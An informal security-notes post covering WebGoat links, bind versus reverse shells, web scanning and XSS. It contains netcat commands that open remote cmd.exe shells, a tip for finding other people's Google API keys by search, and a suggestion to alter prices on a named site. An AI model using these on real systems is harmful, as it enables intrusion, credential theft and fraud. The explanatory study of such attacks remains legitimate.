Few important links and information
The free version of netstalker is now in the lab.
Webgoat is a vunerable server created and maintained by OWASP, it contains the latest vunerabilites, which Security proffesionals could try out. The link below, contains walkthroughs of these vunerabilities and challenges:
http://yehg.org/lab/pr0js/training/webgoat.php
The difference between a bind shell and a reverse bind shell:
Ever notice in the metasploit framework there are two types of payloads (bind/normal and reverse?)
you can bind an application to a particular port. for example : nc -lvvp 666 -e cmd.exe
This command indicates that the cmd is not binded to the port 666. anyone connecting to port 666 will get the cmd output
On the other hand if you are behind a nat it becomes a problem (and thats where reverse bind shell comes in)
First let nnetcat listen on a particular pot: nc -lvvp 666
and conect to it this port, but “throw” the cmd comand shell to it: nc -v “ip address ” 666 -e cmd.exe
As it is an outbound connection it will go through the NAT
What happens here is basically what happens during a client side attack a hacker sends a reverse shell to his listening server from the target machine. How he does that is another question, he can send trojans, worms, BO-exploits. It is essentially a backdoor type payload. Some reverse shells even use IE (the passive x payload) so it as if you are surfing the web.
Web sanning. Some tools like wikito can scan you site against all the google hacks db, for that you need a google API key….if you are lazy you can find that out through google. simple put “google.license_key” into google and you can find someone’s API key.
there are many sites such as langalaxy which do not have proper input validation so tools such as tamperdata for firefox or brup proxy and manipulate the price (and other) fields in order to change the value on the server.
XSS or cross side scripting is a pain of a vunerability. essentially the concept is very simple. If a webserver can accept javascript or other mobile code it can run scripts at the client. it can be inputed in a URL or in any field in a site for example:
http://yehg.org/lab/pr0js/files.php/webgoat_xsslab_stage1.zip